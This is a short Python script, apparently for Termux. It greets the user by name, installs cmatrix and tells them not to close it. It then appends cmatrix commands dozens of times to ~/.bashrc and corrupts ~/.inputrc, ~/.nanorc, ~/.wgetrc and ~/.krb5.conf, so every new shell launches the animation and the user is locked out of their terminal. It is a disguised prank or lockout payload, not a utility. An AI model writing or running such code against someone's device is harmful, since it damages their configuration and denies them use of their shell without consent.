import os
import sys
import time
name = input("whats your name:")
print("please wait " + name)
os.system("pkg install cmatrix")
print("IT WILL TAKE SOMETIME PLEASE WAIT ")
print("DONT CLOSE IT" )
time.sleep(9)
time.sleep(5)
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo '-L' >> ~/.bashrc ")
time.sleep(3)
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9 ")
os.system("cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9 -c yellow -a -b -m -c blue -c white -c black -c cyan -u 9")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
time.sleep(4)
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u -L 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u -L 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u -L 9' >> ~/.nanorc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u -L 9' >> ~/.wgetrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u -L 9' >> ~/.krb5.conf")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.inputrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.bashrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.nanorc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.wgetrc")
os.system("echo 'cmatrix -c red -a -b -m -c blue -c white -c black -c cyan -u 9' >> ~/.krb5.conf")
time.sleep(3)
print ("helll")

